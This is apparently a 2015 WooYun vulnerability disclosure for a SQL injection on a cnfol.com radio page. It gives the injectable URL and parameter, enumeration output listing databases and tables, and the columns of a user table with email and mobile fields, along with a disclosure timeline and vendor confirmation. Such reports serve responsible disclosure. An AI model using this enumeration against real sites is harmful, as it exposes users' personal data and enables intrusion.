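WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles, online reader: http://drop.zone.ci/
2015-08-12: Details reported to the vendor; awaiting vendor handling
2015-08-13: Vendor confirmed; details disclosed to the vendor only
2015-08-23: Details disclosed to core white hats and experts in related fields
2015-09-02: Details disclosed to regular white hats
2015-09-12: Details disclosed to trainee white hats
2015-09-27: Details disclosed to the public
Injection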
http://radio.3g.cnfol.com/index.php?r=Radiostation/Detail&id=%E6%9D%A8%E6%9C%8B%E5%A8%81
Parameter: id
available databases [3]:
[*] cnfol_zjcj
[*] information_schema
[*] test

Database: cnfol_zjcj
[38 tables]
+---------------------+
| Activity            |
| Bl_Install          |
| Bl_Keywords         |
| Bl_Reflex           |
| Bl_UserMobile       |
| Bl_classify         |
| Bl_contentfilter    |
| Bl_resource         |
| Bl_user             |
| GK_AttenList        |
| Invitation          |
| InvitationCode      |
| InvitationExchange  |
| WdtVoice            |
| WdtVoiceCount       |
| backupZjcj_group    |
| bk_blacklist        |
| bk_flower           |
| bk_group            |
| bk_live             |
| bl_con              |
| bl_ref              |
| bl_secret           |
| syslog              |
| tbAppStock          |
| tbUserStockOptional |
| unscramble          |
| unscramblexx        |
| weidiantai1         |
| zjcj_androiddevice  |
| zjcj_content        |
| zjcj_content_201507 |
| zjcj_group          |
| zjcj_iosdevice      |
| zjcj_operate        |
| zjcj_user           |
| zjcj_userchat       |
| zjcj_userjoin       |
+---------------------+

Database: cnfol_zjcj
Table: Bl_user
[14 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| addtime       | datetime     |
| checkCode     | varchar(500) |
| delstatus     | int(11)      |
| email         | varchar(500) |
| headPic       | varchar(500) |
| manage        | int(11)      |
| mobile        | varchar(500) |
| point         | int(11)      |
| publishNumber | int(11)      |
| replyNumber   | int(11)      |
| state         | int(11)      |
| userId        | int(11)      |
| userName      | varchar(500) |
| userNick      | varchar(500) |
+---------------+--------------+
Only a few rows were dumped.
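Testing stopped there; nothing further was done.
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-08-13 10:24
Thank you for providing the vulnerability information; we will fix the vulnerability immediately.
None yet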